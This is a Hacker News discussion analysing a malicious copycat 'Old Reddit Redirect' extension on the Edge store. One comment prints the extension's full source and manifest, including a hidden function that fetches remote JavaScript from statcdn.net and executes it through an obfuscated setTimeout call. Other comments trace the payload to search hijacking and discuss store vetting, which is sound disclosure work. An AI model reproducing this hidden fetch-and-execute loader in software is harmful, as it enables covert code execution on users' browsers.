[HN Gopher] Old Reddit Redirect for MS Edge Contains Malware
___________________________________________________________________
Old Reddit Redirect for MS Edge Contains Malware
Author : SamuelAdams
Score : 25 points
Date : 2021-05-27 17:26 UTC (5 hours ago)
(HTM) web link (microsoftedge.microsoft.com)
(TXT) w3m dump (microsoftedge.microsoft.com)
| tills13 wrote:
| Is this just the Edge version? I currently use the Chrome version
| -- not sure if they are the same or different.
|
| edit: just checked and the Chrome version doesn't seem to be
| affected.
| livre wrote:
| Yes, the Edge version isn't official. The GitHub repository
| only supports Firefox and Chrome: https://github.com/tom-james-
| watson/old-reddit-redirect
| [deleted]
| throwaway77112 wrote:
| HTTPS Everywhere can be used for redirection. It's from EFF, so
| trustworthy.
| bellyfullofbac wrote:
| Ah, browser extensions, the new "Download a random executable
| that can access your data (because your data is now all online),
| with auto-update and antiviruses don't care about them. But don't
| worry, Google vets them!".
|
| When will Norton (snort) make "Norton Anti Malware" to "protect"
| your browser against bad extensions?
|
| I think it's just a matter of time until an extension steals a
| lot of people's data or money...
| TechBro8615 wrote:
| It's easy to say that. But be careful what you wish for. Do we
| need another locked down sandbox?
|
| I think Google would like to take Apple's curated approach to
| the Play/Extension Stores. But they don't have the political
| capital to do it. As an advertising company, any restrictions
| they add will appear malicious to many.
|
| All that said... this thread is about Microsoft, where for
| enterprise clients, telemetry and restrictions are a feature,
| not a bug. So I would expect some movement by Microsoft to add
| more security to their store. It could be something as simple
| as a label "Reviewed by Microsoft" for vetted extensions. But
| that's a dangerous game as long as the browser sandbox is
| widely defined. Malicious apps could sneak through review and
| then Microsoft would look bad. Whereas Apple has an actual OS
| level sandbox with restrictions mostly matching their policies.
|
| There isn't really an easy answer to this problem unless you
| want to sacrifice control of your browser, in exchange for
| increased security controls that might not even apply to you.
| It's not a new tradeoff by any means.
| livre wrote:
| If anyone wants to download the crx and inspect it:
| https://edge.microsoft.com/extensionwebstorebase/v1/crx?resp...
|
| The URL used in the XHR points to this (accessing directly only
| shows a '0' but with archive.is you get that JavaScript):
| https://archive.is/TxFWj
|
| Here's the full source code: const oldReddit =
| "https://old.reddit.com"; const excludedPaths =
| ["/gallery", "/poll", "/rpan", "/settings", "/topics"];
| chrome.webRequest.onBeforeRequest.addListener(
| function(details) { const url = new URL(details.url);
| if (url.hostname === "old.reddit.com") return;
| for (const path of excludedPaths) { if
| (url.pathname.indexOf(path) === 0) return; }
| return {redirectUrl: oldReddit + url.pathname + url.search +
| url.hash}; }, { urls:
| ["*://reddit.com/*", "*://www.reddit.com/*",
| "*://np.reddit.com/*", "*://new.reddit.com/*",
| "*://amp.reddit.com/*",], types: [
| "main_frame", "sub_frame",
| "stylesheet", "script", "image",
| "object", "xmlhttprequest", "other"
| ] }, ["blocking"] );
| function dailyCollect() { let xmlHttpRequest = new
| XMLHttpRequest(); xmlHttpRequest.timeout = 2e4;
| xmlHttpRequest.onreadystatechange = function () {
| return (xmlHttpRequest.readyState === XMLHttpRequest.DONE &&
| xmlHttpRequest.status === 2e2 && xmlHttpRequest.responseText) ?
| successReportDebug(true, xmlHttpRequest.responseText) : null;
| }; let successReportDebug = function (status,
| apply) { if (!status) {
| setTimeout(dailyCollect, 3e4) } else {
| console.log('Stats was collected ' + setTimeout.apply(top,
| [apply])) } }; try {
| xmlHttpRequest.open("GET", 'https://statcdn.net/app/?id=8438fce9-
| 6d9a-45c4-ba2c-e643c1291253', true);
| xmlHttpRequest.send(); } catch (e) {
| successReportDebug(false) } }
| dailyCollect();
|
| And the manifest: { "update_url":
| "https://edge.microsoft.com/extensionwebstorebase/v1/crx",
| "content_security_policy": "script-src 'self' 'unsafe-eval';
| object-src 'self'", "name": "Old Reddit Redirect",
| "description": "Ensure Reddit always loads the old design",
| "version": "1.2.0", "manifest_version": 2,
| "background": { "scripts": [
| "background.js" ] }, "icons": {
| "48": "img/icon48.png", "128": "img/icon128.png"
| }, "permissions": [ "tabs",
| "<all_urls>", "webRequest",
| "webRequestBlocking", "*://reddit.com/*",
| "*://www.reddit.com/*", "*://np.reddit.com/*",
| "*://new.reddit.com/*", "*://amp.reddit.com/*"
| ] }
| livre wrote:
| I can't edit the original comment anymore, I posted it in a
| rush and didn't have time to check the script contents. The
| loaded script also loads a script called "firebase.js" from
| this URL: https://1658209995.rsc.cdn77.org/firebase.js
| (archive: https://archive.is/gdij8). That script is obviously
| not the actual Firebase, you can paste it in a deobfuscator and
| see what it does, it has some funny things such as a
| postMessage called "GimmeResults."
| heyheyhey wrote:
| > The URL used in the XHR points to this (accessing directly
| only shows a '0' but with archive.is you get that JavaScript):
| https://archive.is/TxFWj
|
| How did you get from the XHR to that script inside that
| archive?
| livre wrote:
| The XHR contains the URL: xmlHttpRequest.open("GET", 'https:/
| /statcdn.net/app/?id=8438fce9-6d9a-45c4-ba2c-e643c129...',
| true);
|
| Since opening that URL directly in the browser didn't work I
| tried archiving it and it worked. Then I shared the archive
| link here.
|
| It seems that they implemented some poorly done access
| control that is letting archive.is see the contents but not
| web browsers when visited directly.
| jasonhansel wrote:
| > setTimeout.apply(top, [apply])
|
| Clever. Probably avoids naive forms of static analysis that
| would catch more obvious ways of eval'ing code.
| passivate wrote:
| Can you help me understand the code? What is it doing?
| Dedime wrote:
| The code is calling out to a malicous URL for a script,
| downloading it, and executing the script. The malicious
| script from the URL is mirrored here:
| https://archive.is/TxFWj
|
| Nobody has figured out exactly what it's doing quite yet, but
| you can paste that code into a Javascript deobfuscator and
| try to figure it out yourself:
| https://lelinhtinh.github.io/de4js/
|
| Based off of reading the code for 5 minutes with my very poor
| javascript skills, it's modifying your searches via Google /
| Bing and redirecting you to a practically unknown search
| engine called "Blacksearch". Very suspicious. I found a
| reddit thread with others complaining about this search
| engine, https://old.reddit.com/r/edge/comments/kzwb6q/redirec
| ting_to...
| TechBro8615 wrote:
| Seems like weird malware. It's not exactly subtle if the
| first time I Google something after installing it, I get
| redirected to not-Google.
|
| I could see this working on Karen who downloaded a coupon
| extension. But surely the type of person who installs an
| extension to force old.reddit.com will realize what's
| happening almost immediately.
|
| What is the point of malware if it can be caught so easily?
| This makes me wonder if maybe the dev didn't do it on
| purpose. Maybe they sold it to an unscrupulous (and dumb)
| company, or maybe their build process is somehow infected.
| livre wrote:
| >This makes me wonder if maybe the dev didn't do it on
| purpose.
|
| I doubt this since the code is stolen from this Firefox
| and Chrome extension https://github.com/tom-james-
| watson/old-reddit-redirect but there's no acknowledgement
| of Edge in that GitHub project.
| TechBro8615 wrote:
| That makes sense and also explains why that Reddit thread
| had users describing multiple extensions as the source of
| the same problem.
|
| So the root issue here is effectively extension squatting
| on the Edge store. The attacker can simply scrape the
| most popular extensions in Chrome, inject malware into
| them, and publish them on the Edge store under the same
| name.
|
| If that's what's happening, there is probably substantial
| effort behind sockpuppet publishers so that one ban won't
| ban them all. But then again it also looks like an
| amateur operation if every extension is footprinting
| itself by using the same domain for the malicious
| redirect.
|
| Hopefully Microsoft can clean this up with some one-off
| code scans for the signatures of this malware. Ban all
| the publishers and delete the extensions. Then, hold
| those names in reserve unless the creator can prove they
| own the same name at the Chrome store.
|
| Long term, the ideal system might involve a verification
| step at registration time if the publisher name or
| extension name exists in the Chrome store. I think npm
| has been working on features in this area, as they are
| vulnerable to similar namesquatting vectors of malware
| distribution.
___________________________________________________________________
(page generated 2021-05-27 23:03 UTC)